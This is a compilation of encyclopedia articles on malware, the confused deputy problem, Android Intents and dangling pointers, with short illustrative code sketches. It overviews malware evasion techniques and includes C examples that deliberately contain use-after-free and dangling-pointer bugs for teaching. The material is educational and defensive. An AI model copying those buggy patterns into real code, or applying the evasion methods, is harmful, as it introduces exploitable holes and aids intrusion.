The 2018 Data Breach Investigations Report by Verizon, cited by CSO Online, states that emails are the primary method of malware delivery, accounting for 96% of malware delivery around the world.[16][17] The first worms, network-borne infectious programs, originated not on personal computers but on multitasking Unix systems. The first well-known worm was the Morris worm of 1988, which infected SunOS and VAX BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process.[18] This same behavior is used by today's worms as well.[19] With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code.[20] Many early infectious programs, including the Morris worm, the first Internet worm, were written as experiments or pranks.[21] Today, malware is used by both black hat hackers and governments to steal personal, financial, or business information.[22][23] Today, any device that plugs into a USB port – even lights, fans, speakers, toys, or peripherals such as a digital microscope – can be used to spread malware. Devices can be infected during manufacturing or supply if quality control is inadequate.[15] Since the rise of widespread broadband Internet access, malicious software has more frequently been designed for profit. Since 2003, the majority of widespread viruses and worms have been designed to take control of users' computers for illicit purposes.[24] Infected "zombie computers" can be used to send email spam, to host contraband data such as child pornography,[25] or to engage in distributed denial-of-service attacks as a form of extortion.[26] Malware is used broadly against government or corporate websites to gather sensitive information,[27] or to disrupt their operation in general. Further, malware can be used against individuals to gain information such as personal identification numbers or details, bank or credit card numbers, and passwords.[28][29] In addition to criminal money-making, malware can be used for sabotage, often for political motives. Stuxnet, for example, was designed to disrupt very specific industrial equipment. There have been politically motivated attacks that spread over and shut down large computer networks, including massive deletion of files and corruption of master boot records, described as "computer killing". Such attacks were made on Sony Pictures Entertainment (25 November 2014, using malware known as Shamoon or W32.Disttrack) and Saudi Aramco (August 2012).[30][31] Malware can be classified in numerous ways, and certain malicious programs may fall into two or more categories simultaneously.[1] Broadly, software can be categorised into three types:[32] (i) goodware, (ii) grayware, and (iii) malware.
A computer virus is software usually hidden within another seemingly harmless program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action (such as destroying data).[33]They have been likened tobiological viruses.[3]An example of this is a portable execution infection, a technique, usually used to spread malware, that inserts extra data orexecutable codeintoPE files.[34]A computer virus is software that embeds itself in some otherexecutablesoftware (including the operating system itself) on the target system without the user's knowledge and consent and when it is run, the virus is spread to other executable files. Awormis a stand-alone malware software thatactivelytransmits itself over anetworkto infect other computers and can copy itself without infecting files. These definitions lead to the observation that a virus requires the user to run an infected software or operating system for the virus to spread, whereas a worm spreads itself.[35] Once malicious software is installed on a system, it is essential that it stays concealed, to avoid detection. Software packages known asrootkitsallow this concealment, by modifying the host's operating system so that the malware is hidden from the user. Rootkits can prevent a harmfulprocessfrom being visible in the system's list ofprocesses, or keep its files from being read.[36] Some types of harmful software contain routines to evade identification and/or removal attempts, not merely to hide themselves. An early example of this behavior is recorded in theJargon Filetale of a pair of programs infesting a XeroxCP-Vtime sharing system: Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently stopped program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system.[37] Abackdooris a broad term for a computer program that allows an attacker persistent unauthorised remote access to a victim's machine often without their knowledge.[38]The attacker typically uses another attack (such as atrojan,wormorvirus) to bypass authentication mechanisms usually over an unsecured network such as the Internet to install the backdoor application. A backdoor can also be a side effect of asoftware bugin legitimate software that is exploited by an attacker to gain access to a victim's computer or network. The idea has often been suggested that computer manufacturers preinstall backdoors on their systems to provide technical support for customers, but this has never been reliably verified. It was reported in 2014 that US government agencies had been diverting computers purchased by those considered "targets" to secret workshops where software or hardware permitting remote access by the agency was installed, considered to be among the most productive operations to obtain access to networks around the world.[39]Backdoors may be installed by Trojan horses,worms,implants, or other methods.[40][41] A Trojan horse misrepresents itself to masquerade as a regular, benign program or utility in order to persuade a victim to install it. A Trojan horse usually carries a hidden destructive function that is activated when the application is started. 
The term is derived from the Ancient Greek story of the Trojan horse used to invade the city of Troy by stealth.[42][43] Trojan horses are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to be unsuspicious (e.g., a routine form to be filled in), or by drive-by download. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller (phoning home) which can then have unauthorized access to the affected computer, potentially installing additional software such as a keylogger to steal confidential information, cryptomining software, or adware to generate revenue for the operator of the Trojan.[44] While Trojan horses and backdoors are not easily detectable by themselves, computers may appear to run slower and emit more heat or fan noise due to heavy processor or network usage, as may occur when cryptomining software is installed. Cryptominers may limit resource usage or run only during idle times in an attempt to evade detection. Unlike computer viruses and worms, Trojan horses generally do not attempt to inject themselves into other files or otherwise propagate themselves.[45] In spring 2017, Mac users were hit by a new version of the Proton Remote Access Trojan (RAT)[46] trained to extract password data from various sources, such as browser auto-fill data, the macOS keychain, and password vaults.[47] Droppers are a sub-type of Trojans that solely aim to deliver malware onto the system they infect, seeking to subvert detection through stealth and a light payload.[48] It is important not to confuse a dropper with a loader or stager. A loader or stager merely loads an extension of the malware (for example, a collection of malicious functions through reflective dynamic-link library injection) into memory; the purpose is to keep the initial stage light and undetectable. A dropper, by contrast, merely downloads further malware to the system. Ransomware prevents a user from accessing their files until a ransom is paid. There are two variations of ransomware: crypto ransomware and locker ransomware.[49] Locker ransomware just locks down a computer system without encrypting its contents, whereas crypto ransomware locks down a system and encrypts its contents. For example, programs such as CryptoLocker encrypt files securely, and only decrypt them on payment of a substantial sum of money.[50] Lock-screens, or screen lockers, are a type of "cyber police" ransomware that blocks the screens of Windows or Android devices with a false accusation of harvesting illegal content, trying to scare the victims into paying a fee.[51] Jisut and SLocker impact Android devices more than other lock-screens, with Jisut making up nearly 60 percent of all Android ransomware detections.[52] Encryption-based ransomware, as the name suggests, is a type of ransomware that encrypts all files on an infected machine. These types of malware then display a pop-up informing the user that their files have been encrypted and that they must pay (usually in Bitcoin) to recover them. Some examples of encryption-based ransomware are CryptoLocker and WannaCry.[53] Some malware is used to generate money by click fraud, making it appear that the computer user has clicked an advertising link on a site, generating a payment from the advertiser.
It was estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and that 22% of all ad-clicks were fraudulent.[54] Grayware is any unwanted application or file that can worsen the performance of computers and may cause security risks, but for which there is insufficient consensus or data to classify it as malware.[32] Types of grayware typically include spyware, adware, fraudulent dialers, joke programs ("jokeware") and remote access tools.[38] For example, at one point, Sony BMG compact discs silently installed a rootkit on purchasers' computers with the intention of preventing illicit copying.[55] Potentially unwanted programs (PUPs) are applications that would be considered unwanted despite often being intentionally downloaded by the user.[56] PUPs include spyware, adware, and fraudulent dialers. Many security products classify unauthorised key generators as PUPs, although they frequently carry true malware in addition to their ostensible purpose.[57] In fact, Kammerstetter et al. (2012)[57] estimated that as much as 55% of key generators could contain malware and that about 36% of malicious key generators were not detected by antivirus software. Some types of adware turn off anti-malware and virus protection; technical remedies are available.[58] Programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues are called spyware. Spyware programs do not spread like viruses; instead they are generally installed by exploiting security holes. They can also be hidden and packaged together with unrelated user-installed software.[59] The Sony BMG rootkit was intended to prevent illicit copying, but it also reported on users' listening habits and unintentionally created extra security vulnerabilities.[55] Antivirus software typically uses two techniques to detect malware: (i) static analysis and (ii) dynamic/heuristic analysis.[60] Static analysis involves studying the software code of a potentially malicious program and producing a signature of that program. This information is then used by the antivirus program when comparing scanned files. Because this approach is not useful for malware that has not yet been studied, antivirus software can use dynamic analysis to monitor how the program runs on a computer and block it if it performs unexpected activity. The aim of any malware is to conceal itself from detection by users or antivirus software.[1] Detecting potential malware is difficult for two reasons. The first is that it is difficult to determine whether software is malicious.[32] The second is that malware uses technical measures to make itself more difficult to detect.[60] An estimated 33% of malware is not detected by antivirus software.[57] The most commonly employed anti-detection technique involves encrypting the malware payload in order to prevent antivirus software from recognizing the signature.[32] Tools such as crypters come with an encrypted blob of malicious code and a decryption stub. The stub decrypts the blob and loads it into memory. Because antivirus software does not typically scan memory and only scans files on the drive, this allows the malware to evade detection. Advanced malware has the ability to transform itself into different variations, making it less likely to be detected due to the differences in its signatures. This is known as polymorphic malware.
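To make the signature step of static analysis concrete, the sketch below hashes files and compares the digests against a set of previously catalogued bad digests; the "known bad" set here is invented. Crypter-packed and polymorphic malware defeats exactly this kind of whole-file matching, which is why the evasion techniques listed next matter.

```python
# Minimal sketch of signature (hash) matching in static analysis. Real engines
# also match byte patterns and apply heuristics; the digest below is invented.
import hashlib
import pathlib

KNOWN_BAD = {
    "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
}

def sha256_of(path: pathlib.Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def scan(directory: str) -> None:
    for p in pathlib.Path(directory).rglob("*"):
        if p.is_file() and sha256_of(p) in KNOWN_BAD:
            print(f"match on known signature: {p}")

if __name__ == "__main__":
    scan(".")   # scans the current directory as a demo
```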
Other common techniques used to evade detection include, from common to uncommon:[61] (1) evasion of analysis and detection by fingerprinting the environment when executed;[62] (2) confusing automated tools' detection methods, which allows malware to avoid detection by technologies such as signature-based antivirus software by changing the server used by the malware;[61] (3) timing-based evasion, in which malware runs at certain times or following certain actions taken by the user, so that it executes during certain vulnerable periods, such as during the boot process, while remaining dormant the rest of the time; (4) obfuscating internal data so that automated tools do not detect the malware;[63] (5) information-hiding techniques, namely stegomalware;[64] and (6) fileless malware, which runs within memory instead of using files and utilizes existing system tools to carry out malicious acts. The use of existing binaries to carry out malicious activities is a technique known as LotL, or Living off the Land.[65] This reduces the amount of forensic artifacts available to analyze. Recently these types of attacks have become more frequent, with a 432% increase in 2017, and they made up 35% of attacks in 2018. Such attacks are not easy to perform but are becoming more prevalent with the help of exploit kits.[66][67] A vulnerability is a weakness, flaw or software bug in an application, a complete computer, an operating system, or a computer network that is exploited by malware to bypass defences or gain the privileges it requires to run. For example, TestDisk 6.4 or earlier contained a vulnerability that allowed attackers to inject code into Windows.[68] Malware can exploit security defects (security bugs or vulnerabilities) in the operating system, in applications (such as browsers, e.g. older versions of Microsoft Internet Explorer supported by Windows XP[69]), or in vulnerable versions of browser plugins such as Adobe Flash Player, Adobe Acrobat or Reader, or Java SE.[70][71] For example, a common method is exploitation of a buffer overrun vulnerability, where software designed to store data in a specified region of memory does not prevent more data than the buffer can accommodate from being supplied. Malware may provide data that overflows the buffer, with malicious executable code or data after the end; when this payload is accessed, it does what the attacker, not the legitimate software, determines. Malware can exploit recently discovered vulnerabilities before developers have had time to release a suitable patch.[6] Even when new patches addressing the vulnerability have been released, they may not necessarily be installed immediately, allowing malware to take advantage of systems lacking patches. Sometimes even applying patches or installing new versions does not automatically uninstall the old versions. There are several ways for users to stay informed about and protected from security vulnerabilities in software. Software providers often announce updates that address security issues.[72] Common vulnerabilities are assigned unique identifiers (CVE IDs) and listed in public databases like the National Vulnerability Database. Tools like Secunia PSI,[73] free for personal use, can scan a computer for outdated software with known vulnerabilities and attempt to update it. Firewalls and intrusion prevention systems can monitor network traffic for suspicious activity that might indicate an attack.[74] Users and programs can be assigned more privileges than they require, and malware can take advantage of this.
For example, of 940 Android apps sampled, one third of them asked for more privileges than they required.[75]Apps targeting theAndroidplatform can be a major source of malware infection but one solution is to use third-party software to detect apps that have been assigned excessive privileges.[76] Some systems allow all users to make changes to the core components or settings of the system, which is consideredover-privilegedaccess today. This was the standard operating procedure for early microcomputer and home computer systems, where there was no distinction between anadministratororroot, and a regular user of the system. In some systems,non-administratorusers are over-privileged by design, in the sense that they are allowed to modify internal structures of the system. In some environments, users are over-privileged because they have been inappropriately granted administrator or equivalent status.[77]This can be because users tend to demand more privileges than they need, so often end up being assigned unnecessary privileges.[78] Some systems allow code executed by a user to access all rights of that user, which is known as over-privileged code. This was also standard operating procedure for early microcomputer and home computer systems. Malware, running as over-privileged code, can use this privilege to subvert the system. Almost all currently popular operating systems, and also manyscripting applicationsallow code too many privileges, usually in the sense that when a userexecutescode, the system allows that code all rights of that user.[citation needed] A credential attack occurs when a user account with administrative privileges is cracked and that account is used to provide malware with appropriate privileges.[79]Typically, the attack succeeds because the weakest form of account security is used, which is typically a short password that can be cracked using adictionaryorbrute forceattack. Usingstrong passwordsand enablingtwo-factor authenticationcan reduce this risk. With the latter enabled, even if an attacker can crack the password, they cannot use the account without also having the token possessed by the legitimate user of that account. Homogeneity can be a vulnerability. For example, when all computers in anetworkrun the same operating system, upon exploiting one, onewormcan exploit them all:[80]In particular,Microsoft WindowsorMac OS Xhave such a large share of the market that an exploited vulnerability concentrating on either operating system could subvert a large number of systems. It is estimated that approximately 83% of malware infections between January and March 2020 were spread via systems runningWindows 10.[81]This risk is mitigated by segmenting the networks into differentsubnetworksand setting upfirewallsto block traffic between them.[82][83] Anti-malware (sometimes also calledantivirus) programs block and remove some or all types of malware. For example,Microsoft Security Essentials(for Windows XP, Vista, and Windows 7) andWindows Defender(forWindows 8,10and11) provide real-time protection. 
TheWindows Malicious Software Removal Toolremoves malicious software from the system.[84]Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use).[85]Tests found some free programs to be competitive with commercial ones.[85][86][87] Typically, antivirus software can combat malware in the following ways: A specific component of anti-malware software, commonly referred to as an on-access or real-time scanner, hooks deep into the operating system's core orkerneland functions in a manner similar to how certain malware itself would attempt to operate, though with the user's informed permission for protecting the system. Any time the operating system accesses a file, the on-access scanner checks if the file is infected or not. Typically, when an infected file is found, execution is stopped and the file isquarantinedto prevent further damage with the intention to prevent irreversible system damage. Most AVs allow users to override this behaviour. This can have a considerable performance impact on the operating system, though the degree of impact is dependent on how many pages it creates invirtual memory.[91] Sandboxingis asecurity modelthat confines applications within a controlled environment, restricting their operations to authorized "safe" actions and isolating them from other applications on the host. It also limits access to system resources like memory and the file system to maintain isolation.[89] Browser sandboxing is a security measure that isolates web browser processes and tabs from the operating system to prevent malicious code from exploiting vulnerabilities. It helps protect against malware,zero-day exploits, and unintentional data leaks by trapping potentially harmful code within the sandbox. It involves creating separate processes, limiting access to system resources, runningweb contentin isolated processes, monitoring system calls, and memory constraints.Inter-process communication(IPC) is used forsecure communicationbetween processes. Escaping the sandbox involves targeting vulnerabilities in the sandbox mechanism or the operating system's sandboxing features.[90][92] While sandboxing is not foolproof, it significantly reduces theattack surfaceof common threats. Keeping browsers and operating systems updated is crucial to mitigate vulnerabilities.[90][92] Website vulnerability scans check the website, detect malware, may note outdated software, and may report known security issues, in order to reduce the risk of the site being compromised. Structuring a network as a set of smaller networks, and limiting the flow of traffic between them to that known to be legitimate, can hinder the ability of infectious malware to replicate itself across the wider network.Software-defined networkingprovides techniques to implement such controls. As a last resort, computers can be protected from malware, and the risk of infected computers disseminating trusted information can be greatly reduced by imposing an"air gap"(i.e. completely disconnecting them from all other networks) and applying enhanced controls over the entry and exit of software and data from the outside world. 
However, malware can still cross the air gap in some situations, not least due to the need to introduce software into the air-gapped network, and can damage the availability or integrity of assets thereon. Stuxnet is an example of malware that is introduced to the target environment via a USB drive, causing damage to processes supported on the environment without the need to exfiltrate data. AirHopper,[93] BitWhisper,[94] GSMem[95] and Fansmitter[96] are four techniques introduced by researchers that can leak data from air-gapped computers using electromagnetic, thermal and acoustic emissions. A bibliometric analysis of malware research trends from 2005 to 2015, considering criteria such as impact journals, highly cited articles, research areas, number of publications, keyword frequency, institutions, and authors, revealed an annual growth rate of 34.1%. North America led in research output, followed by Asia and Europe. China and India were identified as emerging contributors.[97]
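As a quick arithmetic check of what that figure implies, compounding 34.1% per year over the study's ten-year window multiplies annual output roughly eighteen-fold:

```python
# Compound growth implied by a 34.1% annual increase over ten years.
rate, years = 0.341, 10
print(f"growth factor: {(1 + rate) ** years:.1f}x")   # about 18.8x
```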
https://en.wikipedia.org/wiki/Malware
Ininformation security, aconfused deputyis acomputer programthat is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system. It is a specific type ofprivilege escalation.[1]Theconfused deputy problemis often cited as an example of whycapability-based securityis important. Capability systemsprotect against the confused deputy problem, whereasaccess-control list–based systems do not.[2] In the original example of a confused deputy,[3]there was acompilerprogram provided on a commercialtimesharingservice. Users could run the compiler and optionally specify a filename where it would write debugging output, and the compiler would be able to write to that file if the user had permission to write there. The compiler also collected statistics about language feature usage. Those statistics were stored in a file called "(SYSX)STAT", in the directory "SYSX". To make this possible, the compiler program was given permission to write to files in SYSX. But there were other files in SYSX: in particular, the system's billing information was stored in a file "(SYSX)BILL". A user ran the compiler and named "(SYSX)BILL" as the desired debugging output file. This produced a confused deputy problem. The compiler made a request to theoperating systemto open (SYSX)BILL. Even though the user did not have access to that file, the compiler did, so the open succeeded. The compiler wrote the compilation output to the file (here "(SYSX)BILL") as normal, overwriting it, and the billing information was destroyed. In this example, the compiler program is the deputy because it is acting at the request of the user. The program is seen as 'confused' because it was tricked into overwriting the system's billing file. Whenever a program tries to access a file, the operating system needs to know two things: which file the program is asking for, and whether the program has permission to access the file. In the example, the file is designated by its name, “(SYSX)BILL”. The program receives the file name from the user, but does not know whether the user had permission to write the file. When the program opens the file, the system uses the program's permission, not the user's. When the file name was passed from the user to the program, the permission did not go along with it; the permission was increased by the system silently and automatically. It is not essential to the attack that the billing file be designated by a name represented as a string. The essential points are that: Across-site request forgery(CSRF) is an example of a confused deputy attack that uses theweb browserto perform sensitive actions against a web application. A common form of this attack occurs when a web application uses a cookie to authenticate all requests transmitted by a browser. UsingJavaScript, an attacker can force a browser into transmitting authenticatedHTTPrequests. TheSamy computer wormusedcross-site scripting(XSS) to turn the browser's authenticated MySpace session into a confused deputy. Using XSS the worm forced the browser into posting an executable copy of the worm as a MySpace message which was then viewed and executed by friends of the infected user. Clickjackingis an attack where the user acts as the confused deputy. 
In this attack a user thinks they are harmlessly browsing a website (an attacker-controlled website) but they are in fact tricked into performing sensitive actions on another website.[4] AnFTP bounce attackcan allow an attacker to connect indirectly toTCPportsto which the attacker's machine has no access, using a remoteFTPserver as the confused deputy. Another example relates topersonal firewallsoftware. It can restrict Internet access for specific applications. Some applications circumvent this by starting a browser with instructions to access a specific URL. The browser has authority to open a network connection, even though the application does not. Firewall software can attempt to address this by prompting the user in cases where one program starts another which then accesses the network. However, the user frequently does not have sufficient information to determine whether such an access is legitimate—false positives are common, and there is a substantial risk that even sophisticated users will become habituated to clicking "OK" to these prompts.[5] Not every program that misuses authority is a confused deputy. Sometimes misuse of authority is simply a result of a program error. The confused deputy problem occurs when the designation of an object is passed from one program to another, and the associated permission changes unintentionally, without any explicit action by either party. It is insidious because neither party did anything explicit to change the authority. In some systems it is possible to ask the operating system to open a file using the permissions of another client. This solution has some drawbacks: The simplest way to solve the confused deputy problem is to bundle together the designation of an object and the permission to access that object. This is exactly what acapabilityis.[citation needed] Using capability security in the compiler example, the client would pass to the server a capability to the output file, such as afile descriptor, rather than the name of the file. Since it lacks a capability to the billing file, it cannot designate that file for output. In the cross-site request forgery example, a URL supplied "cross"-site would include its own authority independent of that of the client of the web browser.
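A small C sketch of the contrast drawn above, offered as an illustration rather than a reconstruction of the original timesharing system: the name-based interface lets the deputy's own authority be misused, while the capability-style interface passes an already-open file descriptor, so the caller can only designate files it was itself able to open.

    #include <fcntl.h>
    #include <string.h>
    #include <unistd.h>

    /* Vulnerable deputy: opens whatever path the client names, using the
       deputy's own permissions, so a "(SYSX)BILL"-style request succeeds. */
    void write_debug_output_by_name(const char *path, const char *text)
    {
        int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd >= 0) {
            write(fd, text, strlen(text));
            close(fd);
        }
    }

    /* Capability-style deputy: the client opens the file itself and hands
       over the descriptor, so designation and permission travel together
       and the deputy cannot write anywhere the client could not. */
    void write_debug_output_by_fd(int fd, const char *text)
    {
        write(fd, text, strlen(text));
    }

    int main(void)
    {
        int fd = open("debug.log", O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd >= 0) {
            write_debug_output_by_fd(fd, "compiler statistics...\n");
            close(fd);
        }
        return 0;
    }

On Unix-like systems a file descriptor behaves as a simple capability: it can even be passed between processes over a local socket, which is how capability-based designs avoid the silent privilege switch described above.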
https://en.wikipedia.org/wiki/Confused_deputy_problem
AnIntentin theAndroid operating systemis asoftwaremechanism that allowsusersto coordinate the functions of different activities to achieve a task. An Intent is a messaging object[1]which provides a facility for performinglate runtime bindingbetween the code in different applications in the Androiddevelopment environment. Its most significant use is in the launching of activities, where it can be thought of as the glue between activities: Intents provide an inter-application messaging system that encourages collaboration andcomponent reuse.[2] An Intent is basically apassive data structureholding anabstract descriptionof an action to be performed.[3]Android Tablet Application Developmentlikens an Intent to flicking a switch: "Your intent is to turn on the light, and to do so, you perform the action of flipping the switch to the On position."[4] The concept was created as a way to allow developers to easily remix different apps and allow each type oftask(calledactivity) to be handled by the application best suited to it, even if provided by a third party. Although the concept was not new, the Android architecture doesn't requireelevated privilegesto access the components, which makes it anopen platform.[5] Activities in Android are defined as classes that control the life cycle of a task in the user interface. The activities supported by an application are declared in amanifest, so that other applications can read what activities are supported. Intents in one application can start particular activities in a different application, if the latter supports the message type of the Intent.[6] An analysis in 2011 by researchers fromThe University of California at Berkeleyfound that Intents can pose asecurity risk, allowing attackers to read content in messages and to insert malicious messages between applications.[2]
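The Android APIs themselves are Java/Kotlin, but the underlying idea, a passive description of an action that is bound to a handler only at run time, can be sketched in a few lines of C. The struct names and the "VIEW" action below are purely illustrative and are not the Android API.

    #include <stdio.h>
    #include <string.h>

    struct intent {
        const char *action;   /* e.g. "VIEW"           */
        const char *data;     /* e.g. a URL to display */
    };

    struct activity {
        const char *handles;                    /* action declared in a manifest */
        void (*start)(const struct intent *);
    };

    static void browser_start(const struct intent *it)
    {
        printf("browser opening %s\n", it->data);
    }

    static struct activity registry[] = {
        { "VIEW", browser_start },
        /* other applications could register further handlers here */
    };

    /* Late runtime binding: the sender names an action, not a component. */
    static void start_activity(const struct intent *it)
    {
        for (size_t i = 0; i < sizeof registry / sizeof registry[0]; i++) {
            if (strcmp(registry[i].handles, it->action) == 0) {
                registry[i].start(it);
                return;
            }
        }
        printf("no activity handles %s\n", it->action);
    }

    int main(void)
    {
        struct intent it = { "VIEW", "https://example.org" };
        start_activity(&it);
        return 0;
    }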
https://en.wikipedia.org/wiki/Intent_(Android)
Dangling pointersandwild pointersincomputer programmingarepointersthat do not point to a valid object of the appropriate type. These are special cases ofmemory safetyviolations. More generally,dangling referencesandwild referencesarereferencesthat do not resolve to a valid destination. Dangling pointers arise duringobject destruction, when an object that is pointed to by a given pointer is deleted or deallocated, without modifying the value of that said pointer, so that the pointer still points to the memory location of the deallocated memory. The system may reallocate the previously freed memory, and if the program thendereferencesthe (now) dangling pointer,unpredictable behaviormay result, as the memory may now contain completely different data. If the program writes to memory referenced by a dangling pointer, a silent corruption of unrelated data may result, leading to subtlebugsthat can be extremely difficult to find. If the memory has been reallocated to another process, then attempting to dereference the dangling pointer can causesegmentation faults(UNIX, Linux) orgeneral protection faults(Windows). If the program has sufficient privileges to allow it to overwrite the bookkeeping data used by the kernel's memory allocator, the corruption can cause system instabilities. Inobject-oriented languageswithgarbage collection, dangling references are prevented by only destroying objects that are unreachable, meaning they do not have any incoming pointers; this is ensured either by tracing orreference counting. However, afinalizermay create new references to an object, requiringobject resurrectionto prevent a dangling reference. Wild pointers, also called uninitialized pointers, arise when a pointer is used prior to initialization to some known state, which is possible in some programming languages. They show the same erratic behavior as dangling pointers, though they are less likely to stay undetected because many compilers will raise a warning at compile time if declared variables are accessed before being initialized.[1] In many languages (e.g., theC programming language) deleting an object from memory explicitly or by destroying thestack frameon return does not alter associated pointers. The pointer still points to the same location in memory even though that location may now be used for other purposes. A straightforward example is shown below: If the operating system is able to detect run-time references tonull pointers, a solution to the above is to assign 0 (null) to dp immediately before the inner block is exited. Another solution would be to somehow guarantee dp is not used again without further initialization. Another frequent source of dangling pointers is a jumbled combination ofmalloc()andfree()library calls: a pointer becomes dangling when the block of memory it points to is freed. As with the previous example one way to avoid this is to make sure to reset the pointer to null after freeing its reference—as demonstrated below. An all too common misstep is returning addresses of a stack-allocated local variable: once a called function returns, the space for these variables gets deallocated and technically they have "garbage values". Attempts to read from the pointer may still return the correct value (1234) for a while after callingfunc, but any functions called thereafter may overwrite the stack storage allocated fornumwith other values and the pointer would no longer work correctly. 
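The code listings referred to above are missing from this copy; the following is a sketch of the classic examples, using the func and num names that the prose mentions.

    #include <stdlib.h>

    /* Dangling pointer into an inner block: c is destroyed when the block
       exits, leaving dp pointing at a dead stack slot. */
    void block_example(void)
    {
        char *dp = NULL;
        {
            char c = 'x';
            dp = &c;
        }
        /* dp is dangling here; assigning NULL to it, or simply never using
           it again, avoids the problem. */
    }

    /* Dangling pointer after free(): the block is released but dp still
       holds its old address.  Resetting dp to NULL afterwards, as the text
       suggests, prevents a later dereference from silently corrupting
       reallocated memory. */
    void heap_example(void)
    {
        char *dp = malloc(16);
        /* ... use dp ... */
        free(dp);       /* dp is now dangling */
        dp = NULL;      /* defensive reset    */
    }

    /* Returning the address of a stack-allocated local: num ceases to
       exist when func returns, so the returned pointer dangles.  Most
       compilers warn about this pattern. */
    int *func(void)
    {
        int num = 1234;
        /* ... */
        return &num;
    }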
If a pointer tonummust be returned,nummust have scope beyond the function—it might be declared asstatic. Antoni Kreczmar[pl](1945–1996) has created a complete object management system which is free of dangling reference phenomenon.[2]A similar approach was proposed by Fisher and LeBlanc[3]under the nameLocks-and-keys. Wild pointers are created by omitting necessary initialization prior to first use. Thus, strictly speaking, every pointer in programming languages which do not enforce initialization begins as a wild pointer. This most often occurs due to jumping over the initialization, not by omitting it. Most compilers are able to warn about this. Likebuffer-overflowbugs, dangling/wild pointer bugs frequently become security holes. For example, if the pointer is used to make avirtual functioncall, a different address (possibly pointing at exploit code) may be called due to thevtablepointer being overwritten. Alternatively, if the pointer is used for writing to memory, some other data structure may be corrupted. Even if the memory is only read once the pointer becomes dangling, it can lead to information leaks (if interesting data is put in the next structure allocated there) or toprivilege escalation(if the now-invalid memory is used in security checks). When a dangling pointer is used after it has been freed without allocating a new chunk of memory to it, this becomes known as a "use after free" vulnerability.[4]For example,CVE-2014-1776is a use-after-free vulnerability in Microsoft Internet Explorer 6 through 11[5]being used byzero-day attacksby anadvanced persistent threat.[6] In C, the simplest technique is to implement an alternative version of thefree()(or alike) function which guarantees the reset of the pointer. However, this technique will not clear other pointer variables which may contain a copy of the pointer. The alternative version can be used even to guarantee the validity of an empty pointer before callingmalloc(): These uses can be masked through#definedirectives to construct useful macros (a common one being#define XFREE(ptr) safefree((void **)&(ptr))), creating something like a metalanguage or can be embedded into a tool library apart. In every case, programmers using this technique should use the safe versions in every instance wherefree()would be used; failing in doing so leads again to the problem. Also, this solution is limited to the scope of a single program or project, and should be properly documented. Among more structured solutions, a popular technique to avoid dangling pointers in C++ is to usesmart pointers. A smart pointer typically usesreference countingto reclaim objects. Some other techniques include thetombstonesmethod and thelocks-and-keysmethod.[3] Another approach is to use theBoehm garbage collector, a conservativegarbage collectorthat replaces standard memory allocation functions in C andC++with a garbage collector. This approach completely eliminates dangling pointer errors by disabling frees, and reclaiming objects by garbage collection. Another approach is to use a system such asCHERI, which stores pointers with additional metadata which may prevent invalid accesses by including lifetime information in pointers. CHERI typically requires support in the CPU to conduct these additional checks. In languages like Java, dangling pointers cannot occur because there is no mechanism to explicitly deallocate memory. Rather, the garbage collector may deallocate memory, but only when the object is no longer reachable from any references. 
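Returning to the C technique described above, here is a sketch of the kind of alternative free() that the quoted XFREE macro wraps; the name safefree follows the macro, and the exact original listing is not reproduced here.

    #include <stdlib.h>

    /* Frees *pp and resets it to NULL, so the pointer the caller passed in
       cannot be left dangling.  Note the limitation mentioned above: other
       copies of the same pointer are not cleared. */
    void safefree(void **pp)
    {
        if (pp != NULL && *pp != NULL) {
            free(*pp);
            *pp = NULL;
        }
    }

    #define XFREE(ptr) safefree((void **)&(ptr))

    /* Because XFREE leaves the variable NULL, a later "allocate only if
       empty" check remains valid:
           XFREE(buf);
           if (buf == NULL)
               buf = malloc(128);
    */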
In the languageRust, thetype systemhas been extended to include also the variables lifetimes andresource acquisition is initialization. Unless one disables the features of the language, dangling pointers will be caught at compile time and reported as programming errors. To expose dangling pointer errors, one common programming technique is to set pointers to thenull pointeror to an invalid address once the storage they point to has been released. When the null pointer is dereferenced (in most languages) the program will immediately terminate—there is no potential for data corruption or unpredictable behavior. This makes the underlying programming mistake easier to find and resolve. This technique does not help when there are multiple copies of the pointer. Some debuggers will automatically overwrite and destroy data that has been freed, usually with a specific pattern, such as0xDEADBEEF(Microsoft's Visual C/C++ debugger, for example, uses0xCC,0xCDor0xDDdepending on what has been freed[7]). This usually prevents the data from being reused by making it useless and also very prominent (the pattern serves to show the programmer that the memory has already been freed). Tools such asPolyspace,TotalView,Valgrind, Mudflap,[8]AddressSanitizer, or tools based onLLVM[9]can also be used to detect uses of dangling pointers. Other tools (SoftBound,Insure++, andCheckPointer) instrument the source code to collect and track legitimate values for pointers ("metadata") and check each pointer access against the metadata for validity. Another strategy, when suspecting a small set of classes, is to temporarily make all their member functionsvirtual: after the class instance has been destructed/freed, its pointer to theVirtual Method Tableis set toNULL, and any call to a member function will crash the program and it will show the guilty code in the debugger.
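A minimal sketch of the fill-pattern idea described above; the 0xDD value mirrors the debugger patterns mentioned, and the helper and its interface are illustrative rather than a standard API.

    #include <stdlib.h>
    #include <string.h>

    /* Debug-build free(): poison the block with a recognizable pattern
       before releasing it, so that any later use of a dangling pointer
       produces conspicuous garbage rather than plausible-looking data.
       The caller must supply the block size in this sketch. */
    void debug_free(void *p, size_t size)
    {
        if (p != NULL) {
            memset(p, 0xDD, size);
            free(p);
        }
    }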
https://en.wikipedia.org/wiki/Use-after-free
